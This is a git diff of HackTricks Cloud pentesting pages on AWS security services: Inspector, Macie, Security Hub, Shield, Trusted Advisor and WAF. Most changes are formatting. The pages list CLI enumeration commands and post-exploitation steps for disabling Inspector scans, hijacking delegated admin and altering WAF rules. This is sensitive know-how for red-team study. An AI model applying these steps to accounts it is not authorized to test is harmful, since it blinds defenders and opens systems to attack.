@@ -317,20 +299,19 @@ aws inspector2 update-filter --filter-arn [--action ] [ aws inspector2 delete-filter --arn ``` -* **Potential Impact**: Concealment or suppression of critical vulnerabilities, or flooding the system with irrelevant findings. +- **Potential Impact**: Concealment or suppression of critical vulnerabilities, or flooding the system with irrelevant findings. #### `inspector2:DisableDelegatedAdminAccount`, (`inspector2:EnableDelegatedAdminAccount` & `organizations:ListDelegatedAdministrators` & `organizations:EnableAWSServiceAccess` & `iam:CreateServiceLinkedRole`) An attacker could significantly disrupt the security management structure. -* Disabling the delegated admin account, the attacker could prevent the security team from accessing and managing Amazon Inspector settings and reports. -* Enabling an unauthorized admin account would allow an attacker to control security configurations, potentially disabling scans or modifying settings to hide malicious activities. +- Disabling the delegated admin account, the attacker could prevent the security team from accessing and managing Amazon Inspector settings and reports. +- Enabling an unauthorized admin account would allow an attacker to control security configurations, potentially disabling scans or modifying settings to hide malicious activities. -{% hint style="warning" %} -It is required for the unauthorized account to be in the same Organization as the victim in order to become the delegated administrator. - -In order for the unauthorized account to become the delegated administrator, it is also required that after the legitimate delegated administrator is disabled, and before the unauthorized account is enabled as the delegated administrator, the legitimate administrator must be deregistered as the delegated administrator from the organization. . 
This can be done with the following command (**`organizations:DeregisterDelegatedAdministrator`** permission required): **`aws organizations deregister-delegated-administrator --account-id --service-principal [inspector2.amazonaws.com](http://inspector2.amazonaws.com/)`** -{% endhint %} +> [!WARNING] +> It is required for the unauthorized account to be in the same Organization as the victim in order to become the delegated administrator. +> +> In order for the unauthorized account to become the delegated administrator, it is also required that after the legitimate delegated administrator is disabled, and before the unauthorized account is enabled as the delegated administrator, the legitimate administrator must be deregistered as the delegated administrator from the organization. . This can be done with the following command (**`organizations:DeregisterDelegatedAdministrator`** permission required): **`aws organizations deregister-delegated-administrator --account-id --service-principal [inspector2.amazonaws.com](http://inspector2.amazonaws.com/)`** ```bash # Disable 
@@ -339,15 +320,14 @@ aws inspector2 disable-delegated-admin-account --delegated-admin-account-id ``` -* **Potential Impact**: Disruption of the security management. +- **Potential Impact**: Disruption of the security management. #### `inspector2:AssociateMember`, `inspector2:DisassociateMember` An attacker could manipulate the association of member accounts within an Amazon Inspector organization. By associating unauthorized accounts or disassociating legitimate ones, an attacker could control which accounts are included in security scans and reporting. This could lead to critical accounts being excluded from security monitoring, enabling the attacker to exploit vulnerabilities in those accounts without detection. -{% hint style="warning" %} -This action requires to be performed by the delegated administrator. -{% endhint %} +> [!WARNING] +> This action requires to be performed by the delegated administrator. ```bash # Associate 
@@ -356,15 +336,14 @@ aws inspector2 associate-member --account-id aws inspector2 disassociate-member --account-id ``` -* **Potential Impact**: Exclusion of key accounts from security scans, enabling undetected exploitation of vulnerabilities. +- **Potential Impact**: Exclusion of key accounts from security scans, enabling undetected exploitation of vulnerabilities. #### `inspector2:Disable`, (`inspector2:Enable` & `iam:CreateServiceLinkedRole`) An attacker with the `inspector2:Disable` permission would be able to disable security scans on specific resource types (EC2, ECR, Lambda, Lambda code) over the specified accounts, leaving parts of the AWS environment unmonitored and vulnerable to attacks. In addition, owing the **`inspector2:Enable`** & **`iam:CreateServiceLinkedRole`** permissions, an attacker could then re-enable scans selectively to avoid detection of suspicious configurations. -{% hint style="warning" %} -This action requires to be performed by the delegated administrator. -{% endhint %} +> [!WARNING] +> This action requires to be performed by the delegated administrator. ```bash # Disable 
@@ -373,21 +352,20 @@ aws inspector2 disable --account-ids [--resource-types <{EC2, ECR, LAMBD aws inspector2 enable --resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}> [--account-ids ] ``` -* **Potential Impact**: Creation of blind spots in the security monitoring. +- **Potential Impact**: Creation of blind spots in the security monitoring. #### `inspector2:UpdateOrganizationConfiguration` An attacker with this permission would be able to update the configurations for your Amazon Inspector organization, affecting the default scanning features enabled for new member accounts. -{% hint style="warning" %} -This action requires to be performed by the delegated administrator. -{% endhint %} +> [!WARNING] +> This action requires to be performed by the delegated administrator. ```bash aws inspector2 update-organization-configuration --auto-enable ``` -* **Potential Impact**: Alter security scan policies and configurations for the organization. +- **Potential Impact**: Alter security scan policies and configurations for the organization. #### `inspector2:TagResource`, `inspector2:UntagResource` 
@@ -398,24 +376,11 @@ aws inspector2 tag-resource --resource-arn --tags aws inspector2 untag-resource --resource-arn --tag-keys ``` -* **Potential Impact**: Hiding of vulnerabilities, disruption of compliance reporting, disruption of security automation and disruption of cost allocation. +- **Potential Impact**: Hiding of vulnerabilities, disruption of compliance reporting, disruption of security automation and disruption of cost allocation. ## References -* [https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html](https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html) -* [https://docs.aws.amazon.com/service-authorization/latest/reference/list\_amazoninspector2.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoninspector2.html) +- [https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html](https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html) +- [https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoninspector2.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoninspector2.html) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md
new file mode 100644
index 000000000..a4a26e683
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md
@@ -0,0 +1,118 @@
+# AWS - Macie Enum
+
+## AWS - Macie Enum
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+## Macie
+
+Amazon Macie stands out as a service designed to **automatically detect, classify, and identify data** within an AWS account. It leverages **machine learning** to continuously monitor and analyze data, primarily focusing on detecting and alerting against unusual or suspicious activities by examining **cloud trail event** data and user behavior patterns.
+
+Key Features of Amazon Macie:
+
+1. **Active Data Review**: Employs machine learning to review data actively as various actions occur within the AWS account.
+2. **Anomaly Detection**: Identifies irregular activities or access patterns, generating alerts to mitigate potential data exposure risks.
+3. **Continuous Monitoring**: Automatically monitors and detects new data in Amazon S3, employing machine learning and artificial intelligence to adapt to data access patterns over time.
+4. **Data Classification with NLP**: Utilizes natural language processing (NLP) to classify and interpret different data types, assigning risk scores to prioritize findings.
+5. **Security Monitoring**: Identifies security-sensitive data, including API keys, secret keys, and personal information, helping to prevent data leaks.
+
+Amazon Macie is a **regional service** and requires the 'AWSMacieServiceCustomerSetupRole' IAM Role and an enabled AWS CloudTrail for functionality.
+
+### Alert System
+
+Macie categorizes alerts into predefined categories like:
+
+- Anonymized access
+- Data compliance
+- Credential Loss
+- Privilege escalation
+- Ransomware
+- Suspicious access, etc.
+
+These alerts provide detailed descriptions and result breakdowns for effective response and resolution.
+
+### Dashboard Features
+
+The dashboard categorizes data into various sections, including:
+
+- S3 Objects (by time range, ACL, PII)
+- High-risk CloudTrail events/users
+- Activity Locations
+- CloudTrail user identity types, and more.
+
+### User Categorization
+
+Users are classified into tiers based on the risk level of their API calls:
+
+- **Platinum**: High-risk API calls, often with admin privileges.
+- **Gold**: Infrastructure-related API calls.
+- **Silver**: Medium-risk API calls.
+- **Bronze**: Low-risk API calls.
+
+### Identity Types
+
+Identity types include Root, IAM user, Assumed Role, Federated User, AWS Account, and AWS Service, indicating the source of requests.
+
+### Data Classification
+
+Data classification encompasses:
+
+- Content-Type: Based on detected content type.
+- File Extension: Based on file extension.
+- Theme: Categorized by keywords within files.
+- Regex: Categorized based on specific regex patterns.
+
+The highest risk among these categories determines the file's final risk level.
+
+### Research and Analysis
+
+Amazon Macie's research function allows for custom queries across all Macie data for in-depth analysis. Filters include CloudTrail Data, S3 Bucket properties, and S3 Objects. Moreover, it supports inviting other accounts to share Amazon Macie, facilitating collaborative data management and security monitoring.
+
+### Enumeration
+
+```
+# Get buckets
+aws macie2 describe-buckets
+
+# Org config
+aws macie2 describe-organization-configuration
+
+# Get admin account (if any)
+aws macie2 get-administrator-account
+aws macie2 list-organization-admin-accounts # Run from the management account of the org
+
+# Get macie account members (run this form the admin account)
+aws macie2 list-members
+
+# Check if automated sensitive data discovey is enabled
+aws macie2 get-automated-discovery-configuration
+
+# Get findings
+aws macie2 list-findings
+aws macie2 get-findings --finding-ids
+aws macie2 list-findings-filters
+aws macie2 get -findings-filters --id
+
+# Get allow lists
+aws macie2 list-allow-lists
+aws macie2 get-allow-list --id
+
+# Get different info
+aws macie2 list-classification-jobs
+aws macie2 list-classification-scopes
+aws macie2 list-custom-data-identifiers
+```
+
+#### Post Exploitation
+
+> [!TIP]
+> From an attackers perspective, this service isn't made to detect the attacker, but to detect sensitive information in the stored files. Therefore, this service might **help an attacker to find sensitive info** inside the buckets.\
+> However, maybe an attacker could also be interested in disrupting it in order to prevent the victim from getting alerts and steal that info easier.
+
+TODO: PRs are welcome!
+
+## References
+
+- [https://cloudacademy.com/blog/introducing-aws-security-hub/](https://cloudacademy.com/blog/introducing-aws-security-hub/)
+
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md
new file mode 100644
index 000000000..3597a5297
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md
@@ -0,0 +1,63 @@ +# AWS - Security Hub Enum + +{{#include ../../../../banners/hacktricks-training.md}} + +## Security Hub + +**Security Hub** collects security **data** from **across AWS accounts**, services, and supported third-party partner products and helps you **analyze your security** trends and identify the highest priority security issues. + +It **centralizes security related alerts across accounts**, and provides a UI for viewing these. The biggest limitation is it **does not centralize alerts across regions**, only across accounts + +**Characteristics** + +- Regional (findings don't cross regions) +- Multi-account support +- Findings from: + - Guard Duty + - Config + - Inspector + - Macie + - third party + - self-generated against CIS standards + +## Enumeration + +``` +# Get basic info +aws securityhub describe-hub + +# Get securityhub org config +aws securityhub describe-organization-configuration #If the current account isn't the security hub admin, you will get an error + +# Get the configured admin for securityhub +aws securityhub get-administrator-account +aws securityhub get-master-account # Another way +aws securityhub list-organization-admin-accounts # Another way + +# Get enabled standards +aws securityhub get-enabled-standards + +# Get the findings +aws securityhub get-findings + +# Get insights +aws securityhub get-insights + +# Get Automation rules (must be from the admin account) +aws securityhub list-automation-rules + +# Get members (must be from the admin account) +aws securityhub list-members +aws securityhub get-members --account-ids +``` + +## Bypass Detection + +TODO, PRs accepted + +## References + +- [https://cloudsecdocs.com/aws/services/logging/other/#general-info](https://cloudsecdocs.com/aws/services/logging/other/#general-info) +- [https://docs.aws.amazon.com/securityhub/latest/userguide/what-is-securityhub.html](https://docs.aws.amazon.com/securityhub/latest/userguide/what-is-securityhub.html) + +{{#include 
../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md new file mode 100644 index 000000000..073fcb091 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md @@ -0,0 +1,15 @@ +# AWS - Shield Enum + +{{#include ../../../../banners/hacktricks-training.md}} + +## Shield + +AWS Shield has been designed to help **protect your infrastructure against distributed denial of service attacks**, commonly known as DDoS. + +**AWS Shield Standard** is **free** to everyone, and it offers **DDoS protection** against some of the more common layer three, the **network layer**, and layer four, **transport layer**, DDoS attacks. This protection is integrated with both CloudFront and Route 53. + +**AWS Shield advanced** offers a **greater level of protection** for DDoS attacks across a wider scope of AWS services for an additional cost. This advanced level offers protection against your web applications running on EC2, CloudFront, ELB and also Route 53. In addition to these additional resource types being protected, there are enhanced levels of DDoS protection offered compared to that of Standard. And you will also have **access to a 24-by-seven specialized DDoS response team at AWS, known as DRT**. + +Whereas the Standard version of Shield offered protection against layer three and layer four, **Advanced also offers protection against layer seven, application, attacks.** + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md new file mode 100644 index 000000000..5ea8a625d 
--- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md 
@@ -0,0 +1,71 @@ +# AWS - Trusted Advisor Enum + +## AWS - Trusted Advisor Enum + +{{#include ../../../../banners/hacktricks-training.md}} + +## AWS Trusted Advisor Overview + +Trusted Advisor is a service that **provides recommendations** to optimize your AWS account, aligning with **AWS best practices**. It's a service that operates across multiple regions. Trusted Advisor offers insights in four primary categories: + +1. **Cost Optimization:** Suggests how to restructure resources to reduce expenses. +2. **Performance:** Identifies potential performance bottlenecks. +3. **Security:** Scans for vulnerabilities or weak security configurations. +4. **Fault Tolerance:** Recommends practices to enhance service resilience and fault tolerance. + +The comprehensive features of Trusted Advisor are exclusively accessible with **AWS business or enterprise support plans**. Without these plans, access is limited to **six core checks**, primarily focused on performance and security. + +### Notifications and Data Refresh + +- Trusted Advisor can issue alerts. +- Items can be excluded from its checks. +- Data is refreshed every 24 hours. However, a manual refresh is possible 5 minutes after the last refresh. + +### **Checks Breakdown** + +#### CategoriesCore + +1. Cost Optimization +2. Security +3. Fault Tolerance +4. Performance +5. Service Limits +6. S3 Bucket Permissions + +#### Core Checks + +Limited to users without business or enterprise support plans: + +1. Security Groups - Specific Ports Unrestricted +2. IAM Use +3. MFA on Root Account +4. EBS Public Snapshots +5. RDS Public Snapshots +6. 
Service Limits + +#### Security Checks + +A list of checks primarily focusing on identifying and rectifying security threats: + +- Security group settings for high-risk ports +- Security group unrestricted access +- Open write/list access to S3 buckets +- MFA enabled on root account +- RDS security group permissiveness +- CloudTrail usage +- SPF records for Route 53 MX records +- HTTPS configuration on ELBs +- Security groups for ELBs +- Certificate checks for CloudFront +- IAM access key rotation (90 days) +- Exposure of access keys (e.g., on GitHub) +- Public visibility of EBS or RDS snapshots +- Weak or absent IAM password policies + +AWS Trusted Advisor acts as a crucial tool in ensuring the optimization, performance, security, and fault tolerance of AWS services based on established best practices. + +## **References** + +- [https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor](https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor) + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md similarity index 73% rename from pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md index 67086a993..8ca8a6a3b 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md 
@@ -2,20 +2,7 @@ ## AWS - WAF Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## AWS WAF @@ -60,7 +47,7 @@ A Lock Token is used for concurrency control when making updates to WAF resource API Keys in AWS WAF are used to authenticate requests to certain API operations. These keys are encrypted and managed securely to control access and ensure that only authorized users can make changes to WAF configurations. -* **Example**: Integration of the CAPTCHA API. +- **Example**: Integration of the CAPTCHA API. #### Permission Policy @@ -70,8 +57,8 @@ A Permission Policy is an IAM policy that specifies who can perform actions on A The scope parameter in AWS WAF specifies whether the WAF rules and configurations apply to a regional application or an Amazon CloudFront distribution. -* **REGIONAL**: Applies to regional services such as Application Load Balancers (ALB), Amazon API Gateway REST API, AWS AppSync GraphQL API, Amazon Cognito user pool, AWS App Runner service and AWS Verified Access instance. You specify the AWS region where these resources are located. -* **CLOUDFRONT**: Applies to Amazon CloudFront distributions, which are global. WAF configurations for CloudFront are managed through the `us-east-1` region regardless of where the content is served. +- **REGIONAL**: Applies to regional services such as Application Load Balancers (ALB), Amazon API Gateway REST API, AWS AppSync GraphQL API, Amazon Cognito user pool, AWS App Runner service and AWS Verified Access instance. You specify the AWS region where these resources are located. +- **CLOUDFRONT**: Applies to Amazon CloudFront distributions, which are global. WAF configurations for CloudFront are managed through the `us-east-1` region regardless of where the content is served. ### Key features 
@@ -81,19 +68,19 @@ The scope parameter in AWS WAF specifies whether the WAF rules and configuration Each AWS account can configure: -* **100 conditions** for each type (except for Regex, where only **10 conditions** are allowed, but this limit can be increased). -* **100 rules** and **50 Web ACLs**. -* A maximum of **5 rate-based rules**. -* A throughput of **10,000 requests per second** when WAF is implemented with an application load balancer. +- **100 conditions** for each type (except for Regex, where only **10 conditions** are allowed, but this limit can be increased). +- **100 rules** and **50 Web ACLs**. +- A maximum of **5 rate-based rules**. +- A throughput of **10,000 requests per second** when WAF is implemented with an application load balancer. #### Rule actions Actions are assigned to each rule, with options being: -* **Allow**: The request is forwarded to the appropriate CloudFront distribution or Application Load Balancer. -* **Block**: The request is terminated immediately. -* **Count**: Tallies the requests meeting the rule's conditions. This is useful for rule testing, confirming the rule's accuracy before setting it to Allow or Block. -* **CAPTCHA and Challenge:** It is verified that the request does not come from a bot using CAPTCHA puzzles and silent challenges. +- **Allow**: The request is forwarded to the appropriate CloudFront distribution or Application Load Balancer. +- **Block**: The request is terminated immediately. +- **Count**: Tallies the requests meeting the rule's conditions. This is useful for rule testing, confirming the rule's accuracy before setting it to Allow or Block. +- **CAPTCHA and Challenge:** It is verified that the request does not come from a bot using CAPTCHA puzzles and silent challenges. If a request doesn't match any rule within the Web ACL, it undergoes the **default action** (Allow or Block). The order of rule execution, defined within a Web ACL, is crucial and typically follows this sequence: 
@@ -109,12 +96,12 @@ AWS WAF integrates with CloudWatch for monitoring, offering metrics like Allowed In order to interact with CloudFront distributions, you must specify the Region US East (N. Virginia): -* CLI - Specify the Region US East when you use the CloudFront scope: `--scope CLOUDFRONT --region=us-east-1` . -* API and SDKs - For all calls, use the Region endpoint us-east-1. +- CLI - Specify the Region US East when you use the CloudFront scope: `--scope CLOUDFRONT --region=us-east-1` . +- API and SDKs - For all calls, use the Region endpoint us-east-1. In order to interact with regional services, you should specify the region: -* Example with the region Europe (Spain): `--scope REGIONAL --region=eu-south-2` +- Example with the region Europe (Spain): `--scope REGIONAL --region=eu-south-2` ```bash # Web ACLs # @@ -128,7 +115,7 @@ aws wafv2 get-web-acl --name --id --scope # Additional permissions needed depending on the protected resource type: cognito-idp:ListResourcesForWebACL, ec2:DescribeVerifiedAccessInstanceWebAclAssociations or apprunner:ListAssociatedServicesForWebAcl ## Retrieve the Web ACL associated with the specified AWS resource aws wafv2 get-web-acl-for-resource --resource-arn # Additional permissions needed depending on the protected resource type: cognito-idp:GetWebACLForResource, ec2:GetVerifiedAccessInstanceWebAcl, wafv2:GetWebACL or apprunner:DescribeWebAclForService - + # Rule groups # ## List of the rule groups available in your AWS account @@ -179,7 +166,7 @@ aws wafv2 get-decrypted-api-key --scope | CLOUDFRONT ## List of logging configurations (storage location of the logs) aws wafv2 list-logging-configurations --scope | CLOUDFRONT --region=us-east-1> [--log-scope ] -## Retrieve the logging configuration settings associated with a specific web ACL +## Retrieve the logging configuration settings associated with a specific web ACL aws wafv2 get-logging-configuration --resource-arn [--log-scope ] [--log-type ] # Miscelaneous # 
@@ -188,7 +175,7 @@ aws wafv2 get-logging-configuration --resource-arn [--log-scope ## Retrieve a sample of web requests that match a specified rule within a WebACL during a specified time range -aws wafv2 get-sampled-requests --web-acl-arn --rule-metric-name --time-window --max-items <1-500> --scope +aws wafv2 get-sampled-requests --web-acl-arn --rule-metric-name --time-window --max-items <1-500> --scope ## Obtains the web ACL capacity unit (WCU) requirements for a specified scope and ruleset aws wafv2 check-capacity --scope | CLOUDFRONT --region=us-east-1> --rules @@ -202,11 +189,10 @@ aws wafv2 get-mobile-sdk-release --platform --release-version ### Post Exploitation / Bypass -{% hint style="success" %} -From an attackers perspective, this service can help the attacker to identify WAF protections and network exposures that could help him to compromise other webs. - -However, an attacker could also be interested in disrupting this service so the webs aren't protected by the WAF. -{% endhint %} +> [!TIP] +> From an attackers perspective, this service can help the attacker to identify WAF protections and network exposures that could help him to compromise other webs. +> +> However, an attacker could also be interested in disrupting this service so the webs aren't protected by the WAF. In many of the Delete and Update operations it would be necessary to provide the **lock token**. This token is used for concurrency control over the resources, ensuring that changes are not accidentally overwritten by multiple users or processes attempting to update the same resource simultaneously. In order to obtain this token you could perform the correspondent **list** or **get** operations over the specific resource. 
@@ -214,9 +200,9 @@ In many of the Delete and Update operations it would be necessary to provide the An attacker would be able to compromise the security of the affected resource by: -* Creating rule groups that could, for instance, block legitimate traffic from legitimate IP addresses, causing a denial of service. -* Updating rule groups, being able to modify its actions for example from **Block** to **Allow**. -* Deleting rule groups that provide critical security measures. +- Creating rule groups that could, for instance, block legitimate traffic from legitimate IP addresses, causing a denial of service. +- Updating rule groups, being able to modify its actions for example from **Block** to **Allow**. +- Deleting rule groups that provide critical security measures. ```bash # Create Rule Group @@ -239,23 +225,23 @@ The **rule.json** file would look like: ```json [ - { - "Name":"BlockLegitimateIPsRule", - "Priority":0, - "Statement": { - "IPSetReferenceStatement": { - "ARN": "arn:aws:wafv2:us-east-1:123456789012:global/ipset/legitIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" - } - }, - "Action":{ - "Block":{} - }, - "VisibilityConfig":{ - "SampledRequestsEnabled":false, - "CloudWatchMetricsEnabled":false, - "MetricName":"BlockLegitimateIPsRule" - } + { + "Name": "BlockLegitimateIPsRule", + "Priority": 0, + "Statement": { + "IPSetReferenceStatement": { + "ARN": "arn:aws:wafv2:us-east-1:123456789012:global/ipset/legitIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" + } + }, + "Action": { + "Block": {} + }, + "VisibilityConfig": { + "SampledRequestsEnabled": false, + "CloudWatchMetricsEnabled": false, + "MetricName": "BlockLegitimateIPsRule" } + } ] ``` 
@@ -265,13 +251,12 @@ The **rule.json** file would look like: With these permissions, an attacker would be able to: -* Create a new Web ACL, introducing rules that either allow malicious traffic through or block legitimate traffic, effectively rendering the WAF useless or causing a denial of service. -* Update existing Web ACLs, being able to modify rules to permit attacks such as SQL injection or cross-site scripting, which were previously blocked, or disrupt normal traffic flow by blocking valid requests. -* Delete a Web ACL, leaving the affected resources entirely unprotected, exposing it to a broad range of web attacks. +- Create a new Web ACL, introducing rules that either allow malicious traffic through or block legitimate traffic, effectively rendering the WAF useless or causing a denial of service. +- Update existing Web ACLs, being able to modify rules to permit attacks such as SQL injection or cross-site scripting, which were previously blocked, or disrupt normal traffic flow by blocking valid requests. +- Delete a Web ACL, leaving the affected resources entirely unprotected, exposing it to a broad range of web attacks. -{% hint style="info" %} -You can only delete the specified **WebACL** if **ManagedByFirewallManager** is false. -{% endhint %} +> [!NOTE] +> You can only delete the specified **WebACL** if **ManagedByFirewallManager** is false. ```bash # Create Web ACL 
@@ -290,45 +275,44 @@ The following examples shows how to update a Web ACL to block the legitimate tra ```json { - "WebACL": { - "Name": "AllowLegitimateIPsWebACL", - "Id": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f", - "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/webacl/AllowLegitimateIPsWebACL/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f", - "DefaultAction": { - "Allow": {} - }, - "Description": "", - "Rules": [ - { - "Name": "AllowLegitimateIPsRule", - "Priority": 0, - "Statement": { - "IPSetReferenceStatement": { - "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" - } - }, - "Action": { - "Allow": {} - }, - "VisibilityConfig": { - "SampledRequestsEnabled": false, - "CloudWatchMetricsEnabled": false, - "MetricName": "AllowLegitimateIPsRule" - } - } - ], - "VisibilityConfig": { - "SampledRequestsEnabled": false, - "CloudWatchMetricsEnabled": false, - "MetricName": "AllowLegitimateIPsWebACL" - }, - "Capacity": 1, - "ManagedByFirewallManager": false, - "LabelNamespace": "awswaf:123456789012:webacl:AllowLegitimateIPsWebACL:" + "WebACL": { + "Name": "AllowLegitimateIPsWebACL", + "Id": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f", + "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/webacl/AllowLegitimateIPsWebACL/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f", + "DefaultAction": { + "Allow": {} }, - "LockToken": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" + "Description": "", + "Rules": [ + { + "Name": "AllowLegitimateIPsRule", + "Priority": 0, + "Statement": { + "IPSetReferenceStatement": { + "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" + } + }, + "Action": { + "Allow": {} + }, + "VisibilityConfig": { + "SampledRequestsEnabled": false, + "CloudWatchMetricsEnabled": false, + "MetricName": "AllowLegitimateIPsRule" + } + } + ], + "VisibilityConfig": { + "SampledRequestsEnabled": false, + "CloudWatchMetricsEnabled": false, + "MetricName": 
"AllowLegitimateIPsWebACL" + }, + "Capacity": 1, + "ManagedByFirewallManager": false, + "LabelNamespace": "awswaf:123456789012:webacl:AllowLegitimateIPsWebACL:" + }, + "LockToken": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" } - ``` Command to update the Web ACL: @@ -341,23 +325,23 @@ The **rule.json** file would look like: ```json [ - { - "Name": "BlockLegitimateIPsRule", - "Priority": 0, - "Statement": { - "IPSetReferenceStatement": { - "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" - } - }, - "Action": { - "Block": {} - }, - "VisibilityConfig": { - "SampledRequestsEnabled": false, - "CloudWatchMetricsEnabled": false, - "MetricName": "BlockLegitimateIPRule" - } + { + "Name": "BlockLegitimateIPsRule", + "Priority": 0, + "Statement": { + "IPSetReferenceStatement": { + "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" + } + }, + "Action": { + "Block": {} + }, + "VisibilityConfig": { + "SampledRequestsEnabled": false, + "CloudWatchMetricsEnabled": false, + "MetricName": "BlockLegitimateIPRule" } + } ] ``` 
@@ -369,20 +353,20 @@ The **`wafv2:AssociateWebACL`** permission would allow an attacker to associate The additional permissions would be needed depending on the protected resource type: -* **Associate** - * apigateway:SetWebACL - * apprunner:AssociateWebAcl - * appsync:SetWebACL - * cognito-idp:AssociateWebACL - * ec2:AssociateVerifiedAccessInstanceWebAcl - * elasticloadbalancing:SetWebAcl -* **Disassociate** - * apigateway:SetWebACL - * apprunner:DisassociateWebAcl - * appsync:SetWebACL - * cognito-idp:DisassociateWebACL - * ec2:DisassociateVerifiedAccessInstanceWebAcl - * elasticloadbalancing:SetWebAcl +- **Associate** + - apigateway:SetWebACL + - apprunner:AssociateWebAcl + - appsync:SetWebACL + - cognito-idp:AssociateWebACL + - ec2:AssociateVerifiedAccessInstanceWebAcl + - elasticloadbalancing:SetWebAcl +- **Disassociate** + - apigateway:SetWebACL + - apprunner:DisassociateWebAcl + - appsync:SetWebACL + - cognito-idp:DisassociateWebACL + - ec2:DisassociateVerifiedAccessInstanceWebAcl + - elasticloadbalancing:SetWebAcl ```bash # Associate 
